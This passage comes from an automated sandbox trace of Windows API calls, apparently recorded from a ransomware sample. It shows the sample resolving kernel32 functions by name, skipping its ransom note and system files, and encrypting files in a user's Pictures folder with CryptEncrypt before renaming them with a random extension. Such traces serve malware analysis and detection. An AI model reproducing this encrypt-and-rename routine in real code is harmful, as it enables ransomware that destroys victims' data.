lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0086.743] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0086.743] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0086.743] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0086.743] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0086.743] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0086.743] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0086.743] lstrlenA (lpString="CREATETHREAD") returned 12 [0086.743] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0086.743] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0086.743] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0086.743] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0086.743] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0086.743] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0086.743] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0086.743] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0086.743] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0086.743] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0086.743] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0086.743] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0086.743] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0086.743] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0086.743] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0086.743] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0086.743] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0086.744] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0086.744] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0086.744] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0086.744] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0086.744] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0086.744] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0086.744] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0086.744] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0086.744] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0086.744] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0086.744] lstrlenA (lpString="CTRLROUTINE") returned 11 [0086.744] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0086.744] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0086.744] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0086.744] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0086.744] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0086.744] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0086.744] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0086.744] lstrlenA (lpString="DEBUGBREAK") returned 10 [0086.744] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0086.744] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0086.744] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0086.744] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0086.744] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0086.744] lstrlenA (lpString="DECODEPOINTER") returned 13 [0086.744] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0086.744] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0086.744] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0086.744] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0086.744] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0086.744] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0086.744] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0086.744] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0086.744] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0086.745] lstrlenA (lpString="DELETEATOM") returned 10 [0086.745] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0086.745] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0086.745] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0086.745] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0086.745] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0086.745] lstrlenA (lpString="DELETEFIBER") returned 11 [0086.745] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0086.745] lstrlenA (lpString="DELETEFILEA") returned 11 [0086.745] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0086.745] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0086.745] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0086.745] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0086.745] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0086.745] lstrlenA (lpString="DELETEFILEW") returned 11 [0086.745] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0086.745] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0086.745] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0086.745] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0086.745] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0086.745] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0086.745] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0086.745] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0086.745] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0086.745] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0086.745] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0086.745] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0086.745] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0086.745] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0086.745] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0086.745] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0086.745] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0086.745] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0086.745] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0086.745] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0086.746] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0086.746] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0086.746] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0086.746] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0086.746] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0086.746] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0086.746] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0086.746] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0086.746] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0086.746] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0086.746] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0086.746] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0086.746] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0086.746] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0086.746] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0086.746] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0086.746] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0086.746] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0086.746] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0086.746] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0086.746] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0086.746] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0086.746] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0086.746] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0086.746] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0086.746] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0086.746] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0086.746] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0086.746] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0086.746] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0086.746] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0086.746] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0086.746] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0086.746] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0086.746] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0086.747] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0086.747] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0086.747] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0086.747] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0086.747] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0086.747] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0086.747] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0086.747] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0086.747] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0086.747] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0086.747] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0086.747] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0086.747] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0086.747] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\EeWqUR.gif") returned 61 [0086.747] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\EeWqUR.gif.Lty6tVW") returned 69 [0086.747] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\EeWqUR.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zelljvzmnja\\eewqur.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\EeWqUR.gif.Lty6tVW" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zelljvzmnja\\eewqur.gif.lty6tvw"), dwFlags=0x0) returned 1 [0086.748] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.749] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.749] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.749] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafc916e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xafc916e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xafc916e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0086.749] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0086.749] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0086.749] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0086.749] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0086.749] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0086.749] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0086.749] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0086.749] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0086.749] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0086.749] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0086.749] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0086.749] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0086.749] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0086.749] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0086.749] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0086.749] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\") returned 51 [0086.750] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0086.750] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\" [0086.750] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\jkbimi8.tmp" [0086.750] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.750] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zelljvzmnja\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0086.750] CloseHandle (hObject=0x0) returned 0 [0086.750] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.750] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd90b97f0, ftCreationTime.dwHighDateTime=0x1d4d37f, ftLastAccessTime.dwLowDateTime=0x208acb40, ftLastAccessTime.dwHighDateTime=0x1d4d4d0, ftLastWriteTime.dwLowDateTime=0x208acb40, ftLastWriteTime.dwHighDateTime=0x1d4d4d0, nFileSizeHigh=0x0, nFileSizeLow=0x129a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="L48TW.bmp", cAlternateFileName="")) returned 1 [0086.750] lstrcmpiW (lpString1="L48TW.bmp", lpString2="DECRYPT-FILES.txt") returned 1 [0086.750] lstrcmpiW (lpString1="L48TW.bmp", lpString2="autorun.inf") returned 1 [0086.750] lstrcmpiW (lpString1="L48TW.bmp", lpString2="boot.ini") returned 1 [0086.750] lstrcmpiW (lpString1="L48TW.bmp", lpString2="desktop.ini") returned 1 [0086.750] lstrcmpiW (lpString1="L48TW.bmp", lpString2="ntuser.dat") returned -1 [0086.750] lstrcmpiW (lpString1="L48TW.bmp", lpString2="iconcache.db") returned 1 [0086.750] lstrcmpiW (lpString1="L48TW.bmp", lpString2="bootsect.bak") returned 1 [0086.750] lstrcmpiW (lpString1="L48TW.bmp", lpString2="ntuser.dat.log") returned -1 [0086.751] lstrcmpiW (lpString1="L48TW.bmp", lpString2="thumbs.db") returned -1 [0086.751] lstrcmpiW (lpString1="L48TW.bmp", lpString2="Bootfont.bin") returned 1 [0086.751] lstrlenW (lpString="L48TW.bmp") returned 9 [0086.751] lstrcmpiW (lpString1="bmp", lpString2="lnk") returned -1 [0086.751] lstrcmpiW (lpString1="bmp", lpString2="exe") returned -1 [0086.751] lstrcmpiW (lpString1="bmp", lpString2="sys") returned -1 [0086.751] lstrcmpiW (lpString1="bmp", lpString2="dll") returned -1 [0086.751] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\") returned 51 [0086.751] lstrlenW (lpString="L48TW.bmp") returned 9 [0086.751] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\" [0086.751] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\", lpString2="L48TW.bmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\L48TW.bmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\L48TW.bmp" [0086.751] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.751] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZeLlJvzMNja\\L48TW.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zelljvzmnja\\l48tw.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0086.751] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=76200) returned 1 [0086.751] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0086.751] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0086.752] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0086.752] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0086.752] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0086.752] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0086.752] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0086.754] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.754] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0086.755] CloseHandle (hObject=0x42c) returned 1 [0086.755] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.755] WriteFile (in: hFile=0x428, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0086.756] CloseHandle (hObject=0x0) returned 0 [0086.756] CloseHandle (hObject=0x428) returned 1 [0086.756] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.756] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.756] GetTickCount () returned 0x114e235 [0086.756] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.757] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0086.757] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0086.757] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0086.757] lstrlenA (lpString="kernel32.dll") returned 12 [0086.757] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0086.757] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0086.757] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0086.757] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0086.757] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0086.757] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0086.758] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0086.758] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0086.758] lstrlenA (lpString="ADDATOMA") returned 8 [0086.758] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0086.758] 